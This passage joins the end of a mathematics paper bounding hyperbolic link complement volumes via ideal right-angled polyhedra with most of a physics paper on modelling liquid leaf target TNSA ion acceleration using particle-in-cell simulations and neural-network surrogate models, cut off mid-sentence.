For example, the link Figure 8. Four-component link \(J_{4}\). Figure 9. Adams transformation. obtained by Adams transformation from the link \(J_{4}\) is shown in Figure 10, it has 5 components, three of which are vertical. Step 3. Applying the method from [28], we decompose \(S^{3}\setminus L\) to the union of two copies of an ideal right-angled hyperbolic polyhedron. Firstly, we replace each vertical component of the link \(L\) with a pair of triangles with a common vertex as shown in Figure 11 for the link \(L_{5}\). In this case, the edges corresponding to the triangles we will call red, and the edges connecting the triangles we will call black. Secondly, we contract each black edge into a point and denote the resulting polyhedron by \(P\). Since each black edge was incident to two trivalent vertices, after the black edges are contracted, new quadrivalent vertices will appear. We will call them by _black_. As a result, all vertices of the polyhedron \(P\) are quadrivalent, moreover, \(t(D)\) of them are red and \(2t(D)\) are black. Thus, \(P\) has \(V=3t(D)\) vertices and at least \(2t(D)\) triangular faces, which, with a two-color chessboard coloring of the faces of the polyhedron, will turn out to be colored in the same color. As noted in [28], the polyhedron \(P\) is an ideal right-angled polyhedron and \(\operatorname{vol}(S^{3}\setminus L)=2\operatorname{vol}(P)\). The polyhedron \(P_{5}\) corresponding to the diagram of the link \(L_{5}\) is shown in the Figure 12. As in the proof of Lemma 3.1, let us consider the union \(DP\) of bipyramids obtained by doubling pyramids with a common apex \(v\), splitting \(P\). The volume of \(DP\) is twice the volume of \(P\) and therefore coincides with the volume of \(\operatorname{vol}(S^{3}\setminus L)\). For \(n\geq 4\) each \(n\)-bipyramid is a union of \(n\) ideal tetrahedra. Each triangular bipyramid, corresponding to one of the \(2t(D)\) triangular faces of the same color, will be divided into two tetrahedra. The remaining triangular bipyramids will be considered divided into 3 tetrahedra. Since the number of vertices \(V=3t(D)>24\) Figure 11. Replacing vertical components of the link \(L_{5}\) with pairs of triangles. Figure 10. Five-component link \(L_{5}\). then (see proof of item (b) of Lemma 3.3) the apex \(v\) can be chosen so that the sum of the sizes of the four faces adjacent to \(v\) is at least \(16\). We get the estimate \[\operatorname{vol}(DP)\leqslant 4v_{tet}\cdot\left(V-\frac{2t(D)+k}{4}\right),\] where \(k\) is the number of tetrahedra corresponding to degenerate bipyramids. Let us estimate the value of \(k\). The vertex \(v\) is adjacent to two triangles that are colored in the same color in the two-color chessboard coloring of the faces of the polyhedron \(P\). The two bipyramids that have these triangles as bases correspond to \(4\) degenerate tetrahedra. The other two faces adjacent to \(v\) can be of any size, but their total number of sides is not less than \(10\). So two bipyramids that have these two faces as bases correspond to at least \(10\) degenerate tetrahedra. Hence we get that \(k\geq 4+10=14\), therefore \[\operatorname{vol}\left(S^{3}\setminus K\right)<\operatorname{vol}\left(S^{3} \setminus L\right)=\operatorname{vol}(DP)\leqslant 4v_{tet}\cdot\left(3t(D)- \frac{2t(D)+14}{4}\right),\] which completes the proof of the Theorem. **Remark 5.2**.: The paper [16] gives a bounds that takes into account the number of triangles \(\Delta\) of the polyhedron \(P\) constructed from the link \(K\): \[\operatorname{vol}(S^{3}\setminus K)\leq v_{tet}\cdot(4t_{1}+6t_{2}+8t_{3}+1 0g_{4}-a-\Delta).\] One can refine the formula (19) in a similar way. Indeed, if the polyhedron \(P\) constructed from the link \(K\) have \(\Delta+2t(D)\) triangles, then \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq 10v_{tet}\cdot\left(t(D)-1.3-\frac{\Delta}{10}\right). \tag{20}\] **Remark 5.3**.: If link \(K\) have a diagram \(D\) with \(t(D)>8\) twists, then the bound (20) improves the bound (12). **Remark 5.4**.: Assume that link \(K\) has such a reduced alternating diagram \(D\) that \(t(D)>8\) and all twists have a length of at least \(5\), that is, \(t_{1}=t_{2}=t_{3}=t_{4}=0\). Then the bound (20) improves the bound (14). In fact, comparing these estimates, we get \[10v_{tet}(t(D)-1.4)<10v_{tet}\,t(D)-12.111063,\] since \(14v_{tet}=14.209174\). Figure 12. Polyhedron \(P_{5}\) for the link \(L_{5}\). Note that apart from the upper bounds for the volumes of hyperbolic links in terms the number of twists, there are few lower bounds. As an example, let us consider the bound obtained in [20]. Suppose the link \(K\) have such a simple reduced alternating diagram \(D\) that \(t(D)\geq 2\) and all twists have a length of at least \(7\), that is, \(t_{1}=t_{2}=t_{3}=t_{4}=t_{5}=t_{6}=0\). Then \[0.70735\cdot(t(D)-1)<\operatorname{vol}{(S^{3}\setminus K)}. \tag{21}\] **Remark 5.5**.: The bound from the Theorem 5.1 can be clarified if there is an information about which faces, other than \(2t(D)\) triangular, are present in the polyhedron \(P\) constructed from the diagram \(D\). Recall that with a two-color chess coloring, \(2t(D)\) triangles have one color, we call it _dark_, and the other polygons have a different color, we call it _white_. Denote by \(f_{n}\), \(n\geq 3\), the number of white \(n\)-gons in \(P\). For example, for the polyhedron \(P\) shown in Figure 12, we have \(f_{3}=3\), \(f_{4}=2\), \(f_{n}=0\), \(n\geq 5\). **Corollary 5.6**.: _Let \(D\) be the diagram of the hyperbolic link \(K\). Let \(f_{n}\) be the number of white \(n\)-gonal faces in the ideal right-angled polyhedron \(P\) constructed from a full augmentation without half-turns of the link \(K\). Then_ \[\operatorname{vol}(S^{3}\setminus K)\leq(4t(D)-8)v_{tet}+2\sum_{n\geq 3}nf_{n} \Lambda\left(\frac{\pi}{n}\right).\] Proof.: As in the proof of Lemma 3.1, we use the fact that the volume of \(n\)-bipyramid is at most \(2n\Lambda(\frac{\pi}{n})\).
2306.13316
Modeling of a Liquid Leaf Target TNSA Experiment using Particle-In-Cell Simulations and Deep Learning
Liquid leaf targets show promise as high repetition rate targets for laser-based ion acceleration using the Target Normal Sheath Acceleration (TNSA) mechanism and are currently under development. In this work, we discuss the effects of different ion species and investigate how they can be leveraged for use as a possible laser-driven neutron source. To aid in this research, we develop a surrogate model for liquid leaf target laser-ion acceleration experiments, based on artificial neural networks. The model is trained using data from Particle-In-Cell (PIC) simulations. The fast inference speed of our deep learning model allows us to optimize experimental parameters for maximum ion energy and laser-energy conversion efficiency. An analysis of parameter influence on our model output, using Sobol and PAWN indices, provides deeper insights into the laser-plasma system.
Benedikt Schmitz, Daniel Kreuter, Oliver Boine-Frankenheim
2023-06-23T06:39:43Z
http://arxiv.org/abs/2306.13316v1
Modeling of a Liquid Leaf Target TNSA Experiment using Particle-In-Cell Simulations and Deep Learning ###### Abstract Liquid leaf targets show promise as high repetition rate targets for laser-based ion acceleration using the Target Normal Sheath Acceleration (TNSA) mechanism and are currently under development. In this work, we discuss the effects of different ion species and investigate how they can be leveraged for use as a possible laser-driven neutron source. To aid in this research, we develop a surrogate model for liquid leaf target laser-ion acceleration experiments, based on artificial neural networks. The model is trained using data from Particle-In-Cell (PIC) simulations. The fast inference speed of our deep learning model allows us to optimize experimental parameters for maximum ion energy and laser-energy conversion efficiency. An analysis of parameter influence on our model output, using Sobol' and PAWN indices, provides deeper insights into the laser-plasma system. TNSA, Deep Learning, PIC, Liquid Leaf, Lorentz Boost, Multi-Species, Numerical Optimization ## I Introduction Laser-accelerated ions have great potential for various applications, such as compact medical accelerators [1; 2; 3; 4], neutron sources [5; 6; 7; 1; 5] or as injectors for conventional accelerators [8]. These applications require a high repetition rate to overcome the drawback of the exponential energy distribution, typical for Target Normal Sheath Acceleration. However, conventional solid-state targets cannot achieve high repetition rates due to engineering difficulties and target supply [9] (Chapter 4.2). For this reason, different targets such as gas [10] or liquid-based targets [11; 12] are currently being developed. In this work, we investigate a liquid leaf target [13] currently under development at TU Darmstadt. This target is a major step towards achieving reproducible, high repetition rate ion bunches from laser-plasma interactions, which is necessary for any kind of application. This new system allows for the operation of a repetitive target with arbitrary H\({}_{2}\)O/D\({}_{2}\)O ratios for the first time, which we investigate in this work. In particular, we aim to train a surrogate model for a liquid leaf target in a target normal sheath acceleration (TNSA) experiment to understand the characteristics of the liquid leaf and its composition, predict ideal operating points and understand how multiple ion species interact with each other. The first aim for the target at TU Darmstadt is the creation of a viable compact neutron source, which requires proton energies larger than the production threshold of neutrons (\(>1.7\,\mathrm{MeV}\)) [6]. Previous attempts at modeling laser-plasma acceleration experiments have been made [14; 15; 16; 17]. With our contributions, presented in this work, we expand on the state-of-the-art by taking more parameters of the experimental setup into account and providing a surrogate for the theory of intricate effects a multi-species target can have on the energy spectrum of the accelerated ions. Huebl et al. [10] have found a strong influence of the mixture ratio of multiple species on the resulting energy spectra in hydrogen-deuterium targets. In section II.1, we expand on their idea and provide indicators for the importance of this effect. Furthermore, while attempts at modeling a laser-plasma acceleration experiment using neural networks have been made [14], we extend previous work with a vast number of Particle-In-Cell simulations to train our models. The chosen approach via deep learning also ensures that expansion (transfer learning) of the model with experimental data is possible. We demonstrate our surrogate model's high performance and utility by optimizing an example laser-plasma acceleration experiment, leveraging non-trivial relationships between the experimental parameters not yet understood by theory (see section III). ## II Plasma target models The following section details our contributions related to the considered multi-species target experiment as well as the creation of our simulation datasets and the training of our surrogate model. For this work, we carried out various PIC simulations to generate our datasets. The bulk of the simulations was computed on the _Virgo_ High-Performance Computing cluster[18] at GSI Helmholtzzentrum, Darmstadt. For these simulations, we used the _Smilei[19]_ PIC code. We determined the resulting surrogate by training an artificial neural network from the simulated data. ### Multi-species target considerations We are considering a liquid leaf target which consists of multiple different atom species. These ion species differ in their charge-to-mass ratio \(q_{i}/m_{i}\). and an ion can have up to \(Z\) different charge states. Taking water, for example, one can have up to 8 ionization states of oxygen and an additional one for the hydrogen component. Water occurs naturally with different isotopes of hydrogen. Taking into account regular water (H\({}_{2}\)O) and heavy water (D\({}_{2}\)O), an additional degree of freedom--the mixtures between the two--must be considered. Since several ion species are present, this can be denoted as a \(n\)-species plasma, where \(n\) is the number of ion states in the plasma. The final non-relativistic kinetic energy of species \(i\) accelerated in a constant electric field \(E_{0}\) scales as \[E_{\rm kin}\propto E_{0}^{2}\frac{q_{i}^{2}}{m_{i}}. \tag{1}\] Therefore, species with a higher \(q_{i}^{2}/m_{i}\) ratio will gain more energy. Provided that the initial densities are similar, species with higher \(q_{i}^{2}/m_{i}\) will deplete most of the available field energy. This energy is then split between different particle species and limits the acceleration efficiency of a single species. Several species interact with each other, leading to a deformation of the particle spectrum. Faster particles take electrons from the sheath and screen the acceleration field for the following heavier particles. These heavier particles are then accelerated in the screened field and hence have less kinetic energy per nucleon and a lower velocity than expected from the assumption above. Mid-energy lighter particles are accelerated by the following heavier particle front due to the Coulomb force, getting compressed in the momentum space. This compression causes plateaus and quasi-monoenergetic features to form. This effect is described in detail and analytically calculated for the asymptotic case for two particle species (deuterium and hydrogen gas) by Huebl et al.[10]. We applied their solutions for 2 species, since we assumed a fully ionized plasma in our simulations to reduce the degrees of freedom inside the plasma. The compression effect on the lighter particle spectrum is visualized in Figure 1 using a PIC simulation for regular H\({}_{2}\)O. Deviations from the ideal Mora[10; 20] can be seen. We can make two observations: Firstly, the lower energy part of the spectrum, in this case until half of the maximum energy, is coarser than the corresponding higher energy part of the spectrum. There is also a peak at around \(10\,\mathrm{MeV}\) in both spectra which makes it possible to compare the spectra against each other. These peaks are shifted by the same amount as the oxygen cutoff is shifted from the hydrogen plateau, which can be assumed to be a correlation due to the particle interaction in this energy range. Secondly, there is a plateau in the hydrogen spectrum starting at around \(30\,\mathrm{MeV}\). This plateau and the corresponding dip before it deviate fairly strongly from the established Mora theory for TNSA (indicated by the dotted lines). This drop/increase combination is explainable by the previously introduced multi-species effect and we want to investigate, predict, and leverage this behavior. If we can describe and predict this effect, we can optimize our ion beam for specific applications. To do this, we need to find a surrogate model for the full spectrum problem. Further insights gained from considering multiple species become evident in section II.2.6. Fully ionized oxygen has the same \(q_{i}/m_{i}\) ratio as deuterium, for example, which reduces the efficiency of deuterium acceleration. In this work, we only modeled the proton part of the spectrum because our data is ambiguous for the Oxygen/Deuterium combination part. However, expanding the dataset to include a sweep of the oxygen's charge number would resolve this ambiguity and yield clearer modeling results for deuterium. Figure 1: Particle energy spectra of hydrogen and oxygen after TNSA PIC simulation of liquid leaf water target. The dotted lines are the corresponding Mora[20] fits for the displayed spectrum. Large deviations from the spectrum (\(30\,\mathrm{MeV}\) and up) can be explained by the multi-species effect. The simulation setup is described in section II.2. The investigated features are sharp and their shape varies. One dimensional simulations have a sharper profile, while higher dimensional ones and real-life experiments are smoother[10; 21]. ### Particle-In-Cell Simulations Setup The simulations reflect a real experiment in reduced dimensions. To sample a larger parameter space in a reasonable time, we reduced the dimensions of the simulation to 1.5D. This means simulating one space and three momentum components. The fields are also sampled in three dimensions. We further applied an additional method to account for angle dependency by applying a transverse Lorentz boost to the system. Details on both the Lorentz boost and the method itself can be found in Appendix C. A sketch of the full setup is displayed in Figure 2. #### ii.2.1 Plasma target The target in the conducted simulations models a liquid leaf target under development at TU Darmstadt Institute of Nuclear Physics and which is similar to the work by George et al. [13]. The liquid leaf target's width is some cm, while the typical irradiation size of a laser is in the order of \(\mathrm{\SIUnitSymbolMicro m}\). We assume, that the surface roughness is negligible and the plasma surface is therefore considered to be planar. When the target is only dependent on one coordinate, it can be described fully by its particle density profile. Thus, the simulation only allows movement along the \(x\) coordinate and is independent of \(y\) and \(z\). We also assume that the plasma is expanded when the main pulse hits the target, and that the pre-plasma and skirt follow an exponential profile. We chose the scale length for the exponential profile as \(0.4\,\mathrm{\SIUnitSymbolMicro m}\) so as to be longer than a comparable setup with a cryogenic (i.e. less evaporative) jet target [22] while still ensuring a well-defined plasma border. The exponential profile thus takes the shape \[n_{\mathrm{exp}}(x)=\frac{n_{0}}{1+\exp(-(x-x_{\mathrm{front}})/l_{\mathrm{s} })} \tag{2}\] where \(l_{\mathrm{s}}=$0.4\,\mathrm{\SIUnitSymbolMicro m}$\) and \(x_{\mathrm{front}}\) is the location of the target front. The skirt has identical functional shape for the backside of the target. Since a liquid leaf target evaporates, we superimposed the typical vapor density distribution for a liquid leaf target, given by \[n_{\mathrm{LLT}}(r)\approx n\left(r_{\mathrm{jet}}\right)\left(\frac{r_{ \mathrm{jet}}}{r}\right)^{2}\frac{L_{\mathrm{L}}}{\sqrt{r^{2}+L_{\mathrm{L}} ^{2}}}\;, \tag{3}\] where \(n\left(r_{\mathrm{jet}}\right)\) is the water vapor density at the liquid jet surface, \(L_{\mathrm{L}}\approx$3\,\mathrm{cm}$\) is the liquid jet length, and \(r_{\mathrm{jet}}\) is the liquid jet radius [23]. Note that the second term in the above expression has been squared as we expect a faster drop-off of the liquid leaf density in our proposed experimental setup. The assumed particle densities are \(n_{0}=$6.68\times 10^{28}\,\mathrm{m}^{-3}$\) and \(n\left(r_{\mathrm{jet}}\right)=$1.62\times 10^{23}\,\mathrm{m}^{-3}$\) stemming from the liquid density of water and the density estimated at the saturation vapor pressure at \(0\,\mathrm{\SIUnitSymbolCelsius}\)[23]. We also introduced a cut-off of the profile \(4\,\mathrm{\SIUnitSymbolMicro m}\) before and after the target, which washes out by approximately \(1.4\,\mathrm{\SIUnitSymbolMicro m}\) by the time the laser hits the target. This cut-off is only introduced to optimize the simulation's performance. We chose to investigate multi-species effects resulting from a combination of different ion species inside the target. We simulated regular water, heavy water, and a potential mixture between the two. This mixture is indicated by the mixture parameter listed in Table 1, which we varied in discrete steps. The simulation thus consists of up to four species: electrons (\(\mathrm{e}^{-}\)), hydrogen (\(\mathrm{H}^{+}\)), deuterium (\(\mathrm{D}^{+}\)), and oxygen (\(\mathrm{O}^{n+}\)). As the ionization of oxygen is of importance to the model, this was varied as well. All particle species follow the same distribution function defined above. The ion species are initialized cold while the electrons received an initial temperature of \(30\,\mathrm{keV}\) to simulate interaction with a pre-pulse. We used Smilei's defaults for particle initialization, including no ionization or radiation model [24]. The length of one cell is the Debye length at the initial electron temperature, around \(5\,\mathrm{nm}\). For the time resolution, a CFL number of \(0.98\) was used. The interpolation order of the particle shape functions is set to four and the particle per cell count for each species is \(800\). #### ii.2.2 Laserpulse In a 1.5D simulation, the laser pulse is given by its time profile only. We assumed a Gaussian time profile, Figure 2: Overview of the simulation setup. Green marks the plasma target. The lighter green areas indicate the pre-plasma and the skirt implemented. The laser, indicated by the red arrow, hits the plasma under an angle \(\Theta\) – relative to the target normal. After the acceleration time, the momenta of the accelerated particles, given in blue, are registered. For the liquid leaf target, \(d_{1}\) is assumed to be equal to \(d_{3}\). using Smilei's tgaussian profile with the following shape: \[I_{\text{envelope}}(t)=\begin{cases}\exp\left(\frac{-(t-\tau_{\text{L}})^{2}}{( \tau_{\text{L}}/2)^{2}/\ln(2)}\right)&\text{if $t\leq 2\tau_{\text{L}}$}\\ 0&\text{otherwise}\end{cases}\;, \tag{4}\] where \(\tau_{\text{L}}\) is the main laser pulse duration. In this work, we deal with lasers that have a pulse duration \(\tau_{\text{L}}<1\,\text{ps}\) and an \(a_{0}>1\). The laser energy \(E_{\text{L}}\), pulse length \(\tau_{\text{L}}\), polarization, incident angle \(\theta_{\text{L}}\), wavelength \(\lambda_{\text{L}}\) and the target thickness \(d_{\text{T}}\) are variable and are uniformly sampled from the defined intervals in Table 1. Our thought process in choosing exactly these parameters was that we needed to cover the full system, which required the use of 9 parameters. These parameters were chosen based on two different, sometimes contradictory paradigms: one was to allow the similarity equations to take full effect, while the other was to enable experimental validation of the model (see also Appendix A and Appendix B) #### ii.1.3 Simulation Output Quantities The diagnostics recorded are the particles' \(x\)-coordinate, all components of the momentum \(\vec{p}\), and the macro-particle weight \(w\) at the acceleration time \[t_{\text{acc}}=\tau_{\text{L}}+d_{\text{T}}/c_{\text{s}}\;, \tag{5}\] where \(c_{\text{s}}\) is the ion-acoustic velocity. Lecz Lecz (1993) has found that this is a suitable acceleration time after which an isothermal plasma expansion model no longer holds. From these recorded values we reconstruct the energy spectrum of the particles in the lab frame by using Eq. (13). Since all energy spectra have an individual shape and cut-off energy, the spectra were each normalized to the energy range \([0,1]\), counted into 100 bins, and stored as a list together with their respective cut-off energies. In order to keep the numbers more practical, we took the logarithm. An entry for the results of a simulation thus has the following shape: \(\left\{\ln\left(\frac{\text{d}n}{\text{d}E}\right)_{\text{Bin }1},\ldots,\ln\left(\frac{\text{d}n}{\text{d}E}\right)_{\text{Bin }100},E_{\text{max}}\right\}\). Exponentiating and re-scaling by \(E_{\text{max}}\) restores the original energy spectrum accordingly. This same recording scheme is used for all four species for all simulations. We chose that the parameters in Table 1 are uniformly sampled with exception of the laser energy \(E_{\text{L}}\) which we sampled following a square root scale and the mixture was varied in discrete steps. This type of sampling results in significantly more simulations with low \(a_{0}\) than with high \(a_{0}\). To deal with this we forced additional simulations onto dedicated intervals of \(a_{0}\). Although the laser focus-FWHM is technically not relevant in the 1D case we sampled it nonetheless such that together with the sampled laser energy and pulse length the correct \(a_{0}\) was written in the input file. This also ensures comparability with higher-order simulations and experimental data. #### ii.1.4 Simulation statistics We used the setup described above to create a dataset of simulations for our subsequent surrogate model. All parameters were stochastically sampled and their combination can be thought of as a sparse grid. The Virgo cluster employs the Simple Linux Utility for Resource Management (SLURM) Klimner (2008) to schedule incoming jobs where up to \(10\,000\) jobs can be added to the queue simultaneously. The jobs were queued using a script to sample a certain number of parameter combinations and then start a simulation job for each of them. The number of simulations varies between the different species. There were 508 200 simulations for hydrogen and 762 426 simulations for deuterium, resulting in a total of \(1\,270\,626\) simulations. However, the precise number of simulations is not crucial, as long as the number of simulations is in a similar order of magnitude, the results should be comparable. The reduced model, which utilizes only the pure H\({}_{2}\)O data without D\({}_{2}\)O component was trained on a subset of the full dataset with 68 973 entries accordingly. #### ii.1.5 Limitations of 1.5D PIC We used 1.5D simulations as mentioned earlier. These low-dimensional simulations do have some drawbacks. While they, together with our introduced transversal Lorentz boost method (Appendix C), are capable of describing several effects, some are not possible. The main limitation is created by the expansion of the plasma behind the target. In one spatial dimension, no transversal drift of the particles is possible, therefore also no decay of space charge effects exists. The expansion continues until infinity if it is not stopped. Even though we introduced an effective acceleration time \(t_{\text{acc}}\), this problem persists. Since we keep both setup and method constant, the relative behavior of the cut-off energies can still be taken into account, but the absolute value is overestimated. This overestimation is predictable and when applied makes the models directly comparable. Lecz et al. Lecz et al. (2009) have shown that the acceleration time \(t_{\text{acc}}\) cuts off the spectrum, such \begin{table} \begin{tabular}{c c c c c c} \hline \hline No & & Attribute & Sign & Range & Units \\ \hline 1 & Laser & Energy & \(E_{\text{L}}\) & [0.001, 50] & J \\ 2 & Laser & Focus-FWHM & FWHM & [2,20] & \(\,\text{\SIUnitSymbolMicro m}\) \\ 3 & Laser & Pulse length & \(\tau_{\text{L}}\) & [15, 150] & fs \\ 4 & Laser & Polarization & & \{s, p\} & \\ 5 & Laser & Incidence angle & \(\theta_{\text{L}}\) & [0, 85] & \(\,\text{\SIUnitSymbolMicro o}\) \\ 6 & Laser & Wavelength & \(\lambda_{\text{L}}\) & [550, 1100] & nm \\ 7 & Target & Thickness & \(d_{\text{T}}\) & [0.6, 3] & \(\,\text{\SIUnitSymbolMicro m}\) \\ 8 & Target & Mixture & Mix & [0, 100] & \(\,\text{\SIUnitSymbolMicro\%}\) \\ 9 & Target & Oxygen Charge & \(Z_{\text{eff}}\) & \{7, 8\} & \\ \hline \hline \end{tabular} \end{table} Table 1: Table of the physical parameters that were used for sampling of the input files to the 1.5D PIC simulations. Mixture defines the percentage of hydrogen substituted by deuterium. that it is a good approximation of 2D simulations. The simulations have been verified with experiments as well, which have shown that the bias can be mitigated. Furthermore, Sinigardi et al. [28] have shown further scalings between 2D and 3D cutoff energies. Taking both arguments into account we can deduce, that there is a constant scaling factor from 1D to real-world experiments and also to 3D simulations. Similarly, because of the lack of transversal particle movement, we cannot evaluate divergence opening angles in a 1D simulation. #### ii.2.6 Data Discussion by Example We display an example of the spatial distribution from the simulations in Figure 3. An example of the energy spectrum is already displayed in Figure 1. Firstly, in this simulation, we assumed that the target consists of regular water and is fully ionized by the implied laser pre-pulse. Thus, the three species (\(\mathrm{e}^{-}\), \(\mathrm{H}^{+}\), and \(\mathrm{O}^{8+}\)) are initialized with a density ratio of \(10:2:1\) respectively such that overall neutrality is conserved. We display the species' positions at \(t=t_{\mathrm{acc}}\) in Figure 3. In this simulation the laser incidence angle is \(0^{\circ}\), the target thickness is \(2\,\mathrm{\SIUnitSymbolMicro m}\) and the dimensionless laser amplitude is \(a_{0}=20\). We observe the two ion species, \(\mathrm{H}^{+}\) and \(\mathrm{O}^{8+}\) at \(t=t_{\mathrm{acc}}\). The figures show that the species have different positions at the measured time, which means that the species are accelerated separately by the sheath field. The ion front position at the acceleration time for different species varies due to the different charge and mass values as mentioned in section II.1. Calculating the expected variation, following the relation from Huebl et al., for only fully ionized oxygen and hydrogen present, yields a scaling factor of \(x_{\mathrm{F,sim}}^{Q^{8+}}/x_{\mathrm{F,sim}}^{H}\approx 0.68\). The corresponding factor from Figure 3 is \(x_{\mathrm{F,sim}}^{Q^{8+}}/x_{\mathrm{F,sim}}^{H}\approx 0.67(1)\), where the uncertainty results from the binning. We can see that the general TNSA mechanism is still applicable. Although the dynamics of the different particle species with each other are more complex, as we will see later, the general behavior appears to follow classical TNSA theory. This is supported by the kinetic energy spectra of the ion species after acceleration, an example of which is shown in Figure 1. The figure shows the energy spectra of hydrogen and oxygen ions, along with Mora's predicted ideal curve. ### Deep Learning Application We have to correlate the different simulations to each other and find relations and interpolations to allow for an optimization of the full setup. We decided to use a neural network approach with fully connected feedforward topologies and built them in Keras [29] running inside of Tensorflow \(2^{30}\). For hyperparameter tuning, we used the Keras Tuner module [31]. #### ii.2.1 Model Training To predict a particle spectrum, two models are needed. The _spectrum_ model continuously maps {[physical parameters]} = \(\{E,\mathrm{mix},E_{\mathrm{L}},r_{\mathrm{L}},\tau_{\mathrm{L}},s/\mathrm{ p}\mathrm{-pol},\theta_{\mathrm{L}},\lambda_{\mathrm{L}},d_{\mathrm{T}}\}\) onto \(\ln\left(\frac{4\mathrm{n}}{\mathrm{d}E}(E)\right)\) while a second _cutoff_ model only predicts the maximum energy (i.e. when to cut off the continuous spectrum from the first model). We trained a reduced model pair, not taking deuterons into account for regular \(\mathrm{H}_{2}\mathrm{O}\), and a full model pair containing different ratios between \(\mathrm{H}_{2}\mathrm{O}\) and \(\mathrm{D}_{2}\mathrm{O}\). The dedicated features of the PIC simulation can be seen better with the reduced model. We assume that this is a result of the lower number of input dimensions and therefore of the deviating degrees of generalization. We essentially think of the energy spectrum as the graph of a continuous function \(f\), the first model maps {\(x,\mathrm{[system\ parameters]}\)} to \(f(x)\) while the second model predicts the point \(x\) at which the graph gets cut off. Details about the training parameters and the procedure are given in Appendix E. The reduced spectrum model has 6 hidden layers (\(x\to 320\to 288\to 288\to 256\to 256\to 320\to 1\)) while the full spectrum model has 11 hidden layers with 460 neurons each. The cutoff models both have 8 hidden layers (\(x\to 320\to 284\to 288\to 512\to 32\to 480\to 512\to 32\to 1\)). It is worth noting that the input dimension of the reduced spectrum model is one less than the full spectrum model since it does not include the mix parameter. All networks were fully-connected architectures with ReLU activations on their hidden layers. We will now briefly discuss and evaluate the trained models: Reduced Model Pair:The precision of the cutoff models, which attempt to map {[physical parameters]} onto \(E_{\mathrm{max}}\) can be estimated rather easily. For the re Figure 3: Example PIC simulation of water leaf target TNSA experiment. The plot shows the particle distribution at the previously proposed acceleration time \(t_{\mathrm{acc}}\) (Eq. (5)). duced problem, the model achieved a mean squared error of \(8.93\,\mathrm{MeV}^{2}\) on validation data (confer to appendix E), meaning the average error on the prediction of the hydrogen spectrum's maximum energy is projected to be around \(\pm 2.99\,\mathrm{MeV}\). To more intuitively evaluate the reduced spectrum model's predicting capabilities and potential shortcomings, ten simulations with equal parameters (except for random seed) were computed such that their hydrogen ion energy spectra could be compared to the predicted spectrum of the model. A plot of all the spectra is shown in Figure 4. The overall agreement of the model with the simulations is evident. The maximum energy predicted by the cutoff model falls centrally between the maximum energies of the ten simulations, only differing from the simulation average by \(0.2\,\mathrm{MeV}\). Looking at more intricate features of the simulation spectra, however, it is clear that the model possibly generalized slightly too much. At around \(10\,\mathrm{MeV}\) a dip, possibly due to multi-species effects, can be observed in most of the simulations and yet is barely present in the model prediction. Generally, the fluctuations in the simulation spectra are greatly reduced in the neural network predicted spectrum. A reason for this is likely the sheer vastness of differing spectra the model was trained on. Since the parameter space for the training simulations was so large, the model had to generalize to many very different output spectra. Full Model Pair:The full model pair were trained exactly the same as the reduced model pair but with an additional parameter and a larger dataset. The full cutoff model converged with a mean squared error of \(7.25\,\mathrm{MeV}^{2}\) on validation data resulting in a prediction error of \(\pm 2.7\,\mathrm{MeV}\) for the maximum energy of the hydrogen spectrum (confer to appendix E). Again, as given above, the sensitivity of the spectrum model is more complicated to estimate. In Figure 5, we can see that both numerical models, the full and the reduced model do deviate from one another slightly, even if the mixture is set to zero. This is expected behavior since there is a statistical variation in the training of neural networks. Important to note is the deviation in the spectra for different mixture ratios. An influence of the mixture parameter on the spectrum is visible and it can be used to tune the spectrum. The behavior for the full spectrum model is the same as the one for the reduced spectrum model presented in Figure 4, the model is generalizing to a specific degree and has an uncertainty of few MeV for the cut-off energy. #### iii.2.2 Model Efficiency Calling the models in a Python code environment is similar to calling any other function and takes around \(20\,\mathrm{ms}\) on a personal laptop. This time is in stark contrast to the four hours on 16 CPUs taken to run a similar 1D PIC simulation on the HPC cluster. To put this in perspective, we can run inference on the models roughly \(720\,000\) times, while one PIC simulation calculates. We made other attempts at fitting the regression problem using various kernel combinations and Gaussian Process Regression[32], however, they never produced energy spectrum predictions that even came close to the neural network prediction seen in Figure 4, usually being off from simulations by orders of magnitude. As expected, the adaptability of modern unparameterized machine learning methods such as neural network models stands out from other regressors. Figure 4: Reconstructed hydrogen ion energy spectra of ten simulations differing only in their random seed. The energy spectrum prediction by the trained neural network model is indicated with a red dashed line, while the average of the simulations is indicated by the blue dotted line. The curve is obtained from the reduced continuous model and is cut off at the maximum energy determined by the maximum energy model. Figure 5: Model comparison for hydrogen spectra with reference PIC simulation. Dashed lines give the result for the full model, the number indicates the value for the mixture parameter. The PIC reference (for mixture = 0) is displayed with a solid line and the reduced model with a dotted line. ## III Application of the model With a trained surrogate in hand, we were able to take advantage of the model to perform a numerical optimization of an experiment as well as evaluate our models' interpretability. ### Optimization of Parameters for Laser Plasma Interactions In this section, we optimize a TNSA experiment with a water leaf target. We aim at an ideal set of laser and target parameters and apply the previously obtained reduced machine learning model pair. We chose some base parameters that have a proven repetition rate of at least \(1\,\mathrm{Hz}\): Ti:Sa lasers with a central wavelength of \(800\,\mathrm{nm}\) and p-polarized laser light. Exemplary systems would be the VEGA-3 laser at the Centro De Lasereus Pulsados in Salamanca, Spain (CLPU) [33] or DRACO laser at the Helmholt-Zentrum Dresden-Rossendorf [34]. Following the procedure in this section, the model can also be applied to any other system, if its parameters are inside the minimal and maximal physical parameters of our model (see Table 1). If the system's parameters are not included, our model could be expanded by retraining with additional data, using transfer learning [35], or other modern domain adaptation methods [36]. The assumed initial parameters of the laser system are stated in Table 2. In this section, we investigate two different optimization goals. The first goal is to find the maximum cut-off energy, while the second goal is to maximize the laser energy deposition into the plasma. As mentioned we assumed polarization and central laser wavelength as fixed but otherwise allowed all parameters to change, as long as they stayed in the given physical constraints. Since the obvious solution to maximizing output energy is to maximize input energy, the optimizations were computed under the constraint of a constant dimensionless laser amplitude \(a_{0}\). This ensures optimization by exploiting complicated relationships between the physical parameters of the system; a task that can only be feasibly solved with a rapidly callable model. We implemented the optimization utilizing the _SciPy_ Python library [37] and the Byrd-Omojokun algorithm [38] included in its scipy.optimize.minimize routine. The Byrd-Omojokun algorithm allows us to include both, boundary conditions according to Table 1 as well as the equality constraint of constant \(a_{0}\), to leverage the aforementioned non-trivialities of the system. The optimized parameters are displayed in Table 2. The optimizer seems to have taken advantage of incidence angle-dependent absorption effects such as resonance absorption. Additionally, by dramatically increasing laser focus while simultaneously decreasing laser power (energy over time) the maximum ion energy could be optimized without changing the dimensionless laser amplitude \(a_{0}\). Overall, the optimizer was able to increase the maximum ion output energy by a factor of roughly 4. The hydrogen energy spectra for these optimized parameters as well as 